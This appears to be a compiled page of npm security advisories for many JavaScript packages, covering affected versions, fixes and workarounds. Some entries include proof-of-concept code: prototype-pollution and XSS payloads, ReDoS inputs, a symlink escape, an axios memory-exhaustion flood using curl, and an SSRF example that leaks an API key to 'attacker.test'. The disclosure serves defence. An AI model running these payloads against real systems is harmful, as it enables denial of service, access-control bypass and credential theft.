All the vulnerabilities related to the version 1.0.2 of the package
Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code
Using Babel to compile code that was specifically crafted by an attacker can lead to arbitrary code execution during compilation, when using plugins that rely on the path.evaluate()
or path.evaluateTruthy()
internal Babel methods.
Known affected plugins are:
@babel/plugin-transform-runtime
@babel/preset-env
when using its useBuiltIns
option@babel/helper-define-polyfill-provider
, such as babel-plugin-polyfill-corejs3
, babel-plugin-polyfill-corejs2
, babel-plugin-polyfill-es-shims
, babel-plugin-polyfill-regenerator
No other plugins under the @babel/
namespace are impacted, but third-party plugins might be.
Users that only compile trusted code are not impacted.
The vulnerability has been fixed in @babel/traverse@7.23.2
.
Babel 6 does not receive security fixes anymore (see Babel's security policy), hence there is no patch planned for babel-traverse@6
.
@babel/traverse
to v7.23.2 or higher. You can do this by deleting it from your package manager's lockfile and re-installing the dependencies. @babel/core
>=7.23.2 will automatically pull in a non-vulnerable version.@babel/traverse
and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected @babel/traverse
versions:
@babel/plugin-transform-runtime
v7.23.2@babel/preset-env
v7.23.2@babel/helper-define-polyfill-provider
v0.4.3babel-plugin-polyfill-corejs2
v0.4.6babel-plugin-polyfill-corejs3
v0.8.5babel-plugin-polyfill-es-shims
v0.10.0babel-plugin-polyfill-regenerator
v0.5.3Prototype Pollution in JSON5 via Parse Method
The parse
method of the JSON5 library before and including version 2.2.1
does not restrict parsing of keys named __proto__
, allowing specially crafted strings to pollute the prototype of the resulting object.
This vulnerability pollutes the prototype of the object returned by JSON5.parse
and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations.
This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from JSON5.parse
. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution.
This vulnerability is patched in json5 v2.2.2 and later. A patch has also been backported for json5 v1 in versions v1.0.2 and later.
Suppose a developer wants to allow users and admins to perform some risky operation, but they want to restrict what non-admins can do. To accomplish this, they accept a JSON blob from the user, parse it using JSON5.parse
, confirm that the provided data does not set some sensitive keys, and then performs the risky operation using the validated data:
const JSON5 = require('json5');
const doSomethingDangerous = (props) => {
if (props.isAdmin) {
console.log('Doing dangerous thing as admin.');
} else {
console.log('Doing dangerous thing as user.');
}
};
const secCheckKeysSet = (obj, searchKeys) => {
let searchKeyFound = false;
Object.keys(obj).forEach((key) => {
if (searchKeys.indexOf(key) > -1) {
searchKeyFound = true;
}
});
return searchKeyFound;
};
const props = JSON5.parse('{"foo": "bar"}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props); // "Doing dangerous thing as user."
} else {
throw new Error('Forbidden...');
}
If the user attempts to set the isAdmin
key, their request will be rejected:
const props = JSON5.parse('{"foo": "bar", "isAdmin": true}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props);
} else {
throw new Error('Forbidden...'); // Error: Forbidden...
}
However, users can instead set the __proto__
key to {"isAdmin": true}
. JSON5
will parse this key and will set the isAdmin
key on the prototype of the returned object, allowing the user to bypass the security check and run their request as an admin:
const props = JSON5.parse('{"foo": "bar", "__proto__": {"isAdmin": true}}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props); // "Doing dangerous thing as admin."
} else {
throw new Error('Forbidden...');
}
Cross-site Scripting in karma
karma prior to version 6.3.14 contains a cross-site scripting vulnerability.
Open redirect in karma
Karma before 6.3.16 is vulnerable to Open Redirect due to missing validation of the return_url query parameter.
tmp allows arbitrary temporary file / directory write via symbolic link dir
parameter
tmp@0.2.3
is vulnerable to an Arbitrary temporary file / directory write via symbolic link dir
parameter.
According to the documentation there are some conditions that must be held:
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because _resolvePath
does not properly handle symbolic link when resolving paths:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
return path.resolve(path.join(tmpDir, name));
}
}
If the dir
parameter points to a symlink that resolves to a folder outside the tmpDir
, it's possible to bypass the _assertIsRelative
check used in _assertAndSanitizeOptions
:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
let resolvedPath = _resolvePath(name, tmpDir); //<---
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir
is possible.
Tested on a Linux machine.
tmpDir
that points to a directory outside of itmkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
ls -lha $HOME/mydir1 | grep "tmp-"
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
$HOME/mydir1
(outside the tmpDir
):ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
main.js
// npm i tmp@0.2.3
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
A Potential fix could be to call fs.realpathSync
(or similar) that resolves also symbolic links.
function _resolvePath(name, tmpDir) {
let resolvedPath;
if (name.startsWith(tmpDir)) {
resolvedPath = path.resolve(name);
} else {
resolvedPath = path.resolve(path.join(tmpDir, name));
}
return fs.realpathSync(resolvedPath);
}
Arbitrary temporary file / directory write via symlink
Incorrect Default Permissions in log4js
Default file permissions for log files created by the file, fileSync and dateFile appenders are world-readable (in unix). This could cause problems if log files contain sensitive information. This would affect any users that have not supplied their own permissions for the files via the mode parameter in the config.
Fixed by:
Released to NPM in log4js@6.4.0
Every version of log4js published allows passing the mode parameter to the configuration of file appenders, see the documentation for details.
Thanks to ranjit-git for raising the issue, and to @lamweili for fixing the problem.
If you have any questions or comments about this advisory:
Server-Side Request Forgery in Request
The request
package through 2.88.2 for Node.js and the @cypress/request
package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: The request
package is no longer supported by the maintainer.
tough-cookie Prototype Pollution vulnerability
Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false
mode. This issue arises from the manner in which the objects are initialized.
Regular Expression Denial of Service in timespan
Affected versions of timespan
are vulnerable to a regular expression denial of service when parsing dates.
The amplification for this vulnerability is significant, with 50,000 characters resulting in the event loop being blocked for around 10 seconds.
No direct patch is available for this vulnerability.
Currently, the best available solution is to use a functionally equivalent alternative package.
It is also sufficient to ensure that user input is not being passed into timespan
, or that the maximum length of such user input is drastically reduced. Limiting the input length to 150 characters should be sufficient in most cases.
form-data uses unsafe random function in form-data for choosing boundary
form-data uses Math.random()
to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici
by parrot409
-- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347
An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id
header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random()
is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose)
PoC here: https://github.com/benweissmann/CVE-2025-7783-poc
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
For an application to be vulnerable, it must:
form-data
to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
Code Injection in pac-resolver
This affects the package pac-resolver before 5.0.0. This can occur when used with untrusted input, due to unsafe PAC file handling. NOTE: The fix for this vulnerability is applied in the node-degenerator library, a dependency written by the same maintainer.
Code Injection in pac-resolver
This affects the package pac-resolver before 5.0.0. This can occur when used with untrusted input, due to unsafe PAC file handling. NOTE: The fix for this vulnerability is applied in the node-degenerator library, a dependency written by the same maintainer.
Improper parsing of octal bytes in netmask
Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
:exclamation: NOTE: The fix for this issue was incomplete. A subsequent fix was made in version 2.0.1
which was assigned CVE-2021-29418 / GHSA-pch5-whg9-qr2r. For complete protection from this vulnerability an upgrade to version 2.0.1 or later is recommended.
netmask npm package mishandles octal input data
The netmask package before 2.0.1 for Node.js mishandles certain unexpected characters in an IP address string, such as an octal digit of 9. This (in some situations) allows attackers to bypass access control that is based on IP addresses. NOTE: this issue exists because of an incomplete fix for CVE-2021-28918.
Command injection in nodemailer
This affects the package nodemailer before 6.4.16. Use of crafted recipient email addresses may result in arbitrary command flag injection in sendmail transport for sending mails.
nodemailer ReDoS when trying to send a specially crafted email
A ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter attachDataUrls
set, causing the stuck of event loop.
Another flaw was found when nodemailer tries to parse an attachments with a embedded file, causing the stuck of event loop.
Regex: /^data:((?:[^;];)(?:[^,])),(.)$/
Path: compile -> getAttachments -> _processDataUrl
Regex: /(<img\b[^>]* src\s*=[\s"']*)(data:([^;]+);[^"'>\s]+)/
Path: _convertDataImages
https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6 https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698
async function exploit() {
const MailComposer = require(\"nodemailer/lib/mail-composer\");
const MailComposerObject = new MailComposer();
// Create a malicious data URL that will cause excessive backtracking
// This data URL is crafted to have a long sequence of characters that will cause the regex to backtrack
const maliciousDataUrl = 'data:image/png;base64,' + 'A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;'.repeat(1000) + '==';
// Call the vulnerable method with the crafted input
const result = await MailComposerObject._processDataUrl({ path: maliciousDataUrl });
}
await exploit();
ReDoS causes the event loop to stuck a specially crafted evil email can cause this problem.
Header injection in nodemailer
The package nodemailer before 6.6.1 are vulnerable to HTTP Header Injection if unsanitized user input that may contain newlines and carriage returns is passed into an address object.
ip SSRF improper categorization in isPublic
The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.
Arbitrary Code Execution in underscore
The package underscore
from 1.13.0-0 and before 1.13.0-2, from 1.3.2 and before 1.12.1 are vulnerable to Arbitrary Code Execution via the template function, particularly when a variable property is passed as an argument as it is not sanitized.
Node-Redis potential exponential regex in monitor mode
When a client is in monitoring mode, the regex begin used to detected monitor messages could cause exponential backtracking on some strings. This issue could lead to a denial of service.
The problem was fixed in commit 2d11b6d
and was released in version 3.1.1
.
#1569 (GHSL-2021-026)
Cookie exposure in requestretry
Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository fgribreau/node-request-retry prior to 7.0.0 via cookies being leaked to external sites.
Denial of Service in axios
Versions of axios
prior to 0.18.1 are vulnerable to Denial of Service. If a request exceeds the maxContentLength
property, the package prints an error but does not stop the request. This may cause high CPU usage and lead to Denial of Service.
Upgrade to 0.18.1 or later.
Axios is vulnerable to DoS attack through lack of data size check
When Axios runs on Node.js and is given a URL with the data:
scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer
/Blob
) and returns a synthetic 200 response.
This path ignores maxContentLength
/ maxBodyLength
(which only protect HTTP responses), so an attacker can supply a very large data:
URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'
.
The Node adapter (lib/adapters/http.js
) supports the data:
scheme. When axios
encounters a request whose URL starts with data:
, it does not perform an HTTP request. Instead, it calls fromDataURI()
to decode the Base64 payload into a Buffer or Blob.
Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)
:
const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];
if (protocol === 'data:') {
let convertedData;
if (method !== 'GET') {
return settle(resolve, reject, { status: 405, ... });
}
convertedData = fromDataURI(config.url, responseType === 'blob', {
Blob: config.env && config.env.Blob
});
return settle(resolve, reject, { data: convertedData, status: 200, ... });
}
The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)
:
export default function fromDataURI(uri, asBlob, options) {
...
if (protocol === 'data') {
uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
const match = DATA_URL_PATTERN.exec(uri);
...
const body = match[3];
const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
if (asBlob) { return new _Blob([buffer], {type: mime}); }
return buffer;
}
throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
config.maxContentLength
or config.maxBodyLength
, which only apply to HTTP streams.data:
URI of arbitrary size can cause the Node process to allocate the entire content into memory.In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes
exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)
. No such check occurs for data:
URIs.
const axios = require('axios');
async function main() {
// this example decodes ~120 MB
const base64Size = 160_000_000; // 120 MB after decoding
const base64 = 'A'.repeat(base64Size);
const uri = 'data:application/octet-stream;base64,' + base64;
console.log('Generating URI with base64 length:', base64.length);
const response = await axios.get(uri, {
responseType: 'arraybuffer'
});
console.log('Received bytes:', response.data.length);
}
main().catch(err => {
console.error('Error:', err.message);
});
Run with limited heap to force a crash:
node --max-old-space-size=100 poc.js
Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength
, maxBodyLength
and decodes into memory on Node before streaming enabling DoS.
import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";
const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
timeout: 10000,
maxRedirects: 5,
httpAgent, httpsAgent,
headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
validateStatus: c => c >= 200 && c < 400
});
const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";
app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));
app.get("/healthz", (req,res)=>res.send("ok"));
/**
* POST /preview { "url": "<http|https|data URL>" }
* Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
*/
app.post("/preview", async (req, res) => {
const url = req.body?.url;
if (!url) return res.status(400).json({ error: "missing url" });
let u;
try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }
// Developer allows using data:// in the allowlist
const allowed = new Set(["http:", "https:", "data:"]);
if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });
const controller = new AbortController();
const onClose = () => controller.abort();
res.on("close", onClose);
const before = process.memoryUsage().heapUsed;
try {
const r = await axiosClient.get(u.toString(), {
responseType: "stream",
maxContentLength: 8 * 1024, // Axios will ignore this for data:
maxBodyLength: 8 * 1024, // Axios will ignore this for data:
signal: controller.signal
});
// stream only the first 64KB back
const cap = 64 * 1024;
let sent = 0;
const limiter = new PassThrough();
r.data.on("data", (chunk) => {
if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
else { sent += chunk.length; limiter.write(chunk); }
});
r.data.on("end", () => limiter.end());
r.data.on("error", (e) => limiter.destroy(e));
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
limiter.pipe(res);
} catch (err) {
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
res.status(502).json({ error: String(err?.message || err) });
} finally {
res.off("close", onClose);
}
});
app.listen(PORT, () => {
console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});
Run this app and send 3 post requests:
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```
Enforce size limits
For protocol === 'data:'
, inspect the length of the Base64 payload before decoding. If config.maxContentLength
or config.maxBodyLength
is set, reject URIs whose payload exceeds the limit.
Stream decoding
Instead of decoding the entire payload in one Buffer.from
call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
Axios vulnerable to Server-Side Request Forgery
Axios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.
axios Inefficient Regular Expression Complexity vulnerability
axios before v0.21.2 is vulnerable to Inefficient Regular Expression Complexity.
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL
is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Consider the following code snippet:
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// const userId = "123";
const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF
In this example, the request is sent to http://attacker.test/
instead of the baseURL
. As a result, the domain owner of attacker.test
would receive the X-API-KEY
included in the request headers.
It is recommended that:
baseURL
is set, passing an absolute URL such as http://attacker.test/
to get()
should not ignore baseURL
.baseURL
with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL
.Follow the steps below to reproduce the issue:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
$ node main.js
this is server2
Even though baseURL
is set to http://localhost:10001/
, axios sends the request to http://localhost:10002/
.
baseURL
and does not validate path parameters is affected by this issue.Axios Cross-Site Request Forgery Vulnerability
An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
url-parse Incorrectly parses URLs that include an '@'
A specially crafted URL with an '@' sign but empty user info and no hostname, when parsed with url-parse, url-parse will return the incorrect href. In particular,
parse(\"http://@/127.0.0.1\")
Will return:
{
slashes: true,
protocol: 'http:',
hash: '',
query: '',
pathname: '/127.0.0.1',
auth: '',
host: '',
port: '',
hostname: '',
password: '',
username: '',
origin: 'null',
href: 'http:///127.0.0.1'
}
If the 'hostname' or 'origin' attributes of the output from url-parse are used in security decisions and the final 'href' attribute of the output is then used to make a request, the decision may be incorrect.
Path traversal in url-parse
url-parse before 1.5.0 mishandles certain uses of backslash such as http:/ and interprets the URI as a relative path.
Authorization Bypass Through User-Controlled Key in url-parse
url-parse prior to version 1.5.8 is vulnerable to Authorization Bypass Through User-Controlled Key.
Open redirect in url-parse
Affected versions of npm url-parse
are vulnerable to URL Redirection to Untrusted Site.
Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.
url-parse incorrectly parses hostname / protocol due to unstripped leading control characters.
Leading control characters in a URL are not stripped when passed into url-parse. This can cause input URLs to be mistakenly be interpreted as a relative URL without a hostname and protocol, while the WHATWG URL parser will trim control characters and treat it as an absolute URL.
If url-parse is used in security decisions involving the hostname / protocol, and the input URL is used in a client which uses the WHATWG URL parser, the decision may be incorrect.
This can also lead to a cross-site scripting (XSS) vulnerability if url-parse is used to check for the javascript: protocol in URLs. See following example:
const parse = require('url-parse')
const express = require('express')
const app = express()
const port = 3000
url = parse(\"\\bjavascript:alert(1)\")
console.log(url)
app.get('/', (req, res) => {
if (url.protocol !== \"javascript:\") {res.send(\"<a href=\\'\" + url.href + \"\\'>CLICK ME!</a>\")}
})
app.listen(port, () => {
console.log(`Example app listening on port ${port}`)
})
Authorization bypass in url-parse
Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.6.
Uncontrolled resource consumption in braces
The NPM package braces
fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In lib/parse.js,
if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.
Regular Expression Denial of Service (ReDoS) in micromatch
The NPM package micromatch
prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces()
in index.js
because the pattern .*
will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.
socket.io has an unhandled 'error' event
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
node:events:502
throw err; // Unhandled 'error' event
^
Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
at new NodeError (node:internal/errors:405:5)
at Socket.emit (node:events:500:17)
at /myapp/node_modules/socket.io/lib/socket.js:531:14
at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
code: 'ERR_UNHANDLED_ERROR',
context: undefined
}
| Version range | Needs minor update? |
|------------------|------------------------------------------------|
| 4.6.2...latest
| Nothing to do |
| 3.0.0...4.6.1
| Please upgrade to socket.io@4.6.2
(at least) |
| 2.3.0...2.5.0
| Please upgrade to socket.io@2.5.1
|
This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2
(released in May 2023).
The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c
As a workaround for the affected versions of the socket.io
package, you can attach a listener for the "error" event:
io.on("connection", (socket) => {
socket.on("error", () => {
// ...
});
});
If you have any questions or comments about this advisory:
Thanks a lot to Paul Taylor for the responsible disclosure.
CORS misconfiguration in socket.io
The package socket.io before 2.4.0 are vulnerable to Insecure Defaults due to CORS Misconfiguration. All domains are whitelisted by default.
Resource exhaustion in engine.io
Engine.IO before 4.0.0 and 3.6.0 allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport.
Uncaught exception in engine.io
A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.
events.js:292
throw er; // Unhandled 'error' event
^
Error: read ECONNRESET
at TCP.onStreamRead (internal/stream_base_commons.js:209:20)
Emitted 'error' event on Socket instance at:
at emitErrorNT (internal/streams/destroy.js:106:8)
at emitErrorCloseNT (internal/streams/destroy.js:74:3)
at processTicksAndRejections (internal/process/task_queues.js:80:21) {
errno: -104,
code: 'ECONNRESET',
syscall: 'read'
}
This impacts all the users of the engine.io
package, including those who uses depending packages like socket.io
.
A fix has been released today (2022/11/20):
| Version range | Fixed version |
|-------------------|---------------|
| engine.io@3.x.y
| 3.6.1
|
| engine.io@6.x.y
| 6.2.1
|
For socket.io
users:
| Version range | engine.io
version | Needs minor update? |
|-----------------------------|---------------------|--------------------------------------------------------------------------------------------------------|
| socket.io@4.5.x
| ~6.2.0
| npm audit fix
should be sufficient |
| socket.io@4.4.x
| ~6.1.0
| Please upgrade to socket.io@4.5.x
|
| socket.io@4.3.x
| ~6.0.0
| Please upgrade to socket.io@4.5.x
|
| socket.io@4.2.x
| ~5.2.0
| Please upgrade to socket.io@4.5.x
|
| socket.io@4.1.x
| ~5.1.1
| Please upgrade to socket.io@4.5.x
|
| socket.io@4.0.x
| ~5.0.0
| Please upgrade to socket.io@4.5.x
|
| socket.io@3.1.x
| ~4.1.0
| Please upgrade to socket.io@4.5.x
(see here) |
| socket.io@3.0.x
| ~4.0.0
| Please upgrade to socket.io@4.5.x
(see here) |
| socket.io@2.5.0
| ~3.6.0
| npm audit fix
should be sufficient |
| socket.io@2.4.x
and below | ~3.5.0
| Please upgrade to socket.io@2.5.0
|
There is no known workaround except upgrading to a safe version.
If you have any questions or comments about this advisory:
engine.io
Thanks to Jonathan Neve for the responsible disclosure.
cookie accepts cookie name, path, and domain with out of bounds characters
The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value)
would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test"
, setting userName
cookie to <script>
and ignoring value
.
A similar escape can be used for path
and domain
, which could be abused to alter other fields of the cookie.
Upgrade to 0.7.0, which updates the validation for name
, path
, and domain
.
Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.
async function exploit() {
const parseuri = require("parse-uri");
// This input is designed to cause excessive backtracking in the regex
const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
const result = await parseuri(craftedInput);
}
await exploit();
Improper Certificate Validation in xmlhttprequest-ssl
The xmlhttprequest-ssl package before 1.6.1 for Node.js disables SSL certificate validation by default, because rejectUnauthorized (when the property exists but is undefined) is considered to be false within the https.request function of Node.js. In other words, no certificate is ever rejected.
xmlhttprequest and xmlhttprequest-ssl vulnerable to Arbitrary Code Injection
